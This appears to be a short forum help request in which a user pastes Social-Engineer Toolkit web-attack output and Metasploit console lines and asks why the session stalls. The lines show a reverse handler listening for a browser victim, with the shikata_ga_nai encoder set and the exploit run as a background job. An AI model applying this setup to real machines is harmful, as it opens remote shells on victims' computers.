************************************************** *
Web Server Launched. Welcome to the SET Web Attack.
************************************************** *


[--] Tested on IE6, IE7, IE8 and FireFox [--]


Type <control>-c to exit..
192.168.0.59 - - [26/Oct/2009 05:11:59] "GET / HTTP/1.1" 200 -
i get that in one of the window :P that shows my infected computer connect to the exploit i guess, but then i have this in my other window

ENCODING => shikata_ga_nai
resource> set ExitOnSession false
ExitOnSession => false
resource> exploit -j
[*] Exploit running as Background job.
msf exploit (handler) >
[*] Handler Binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler
and it just fezzes there :P so what is the problem ? ^^ any ides ?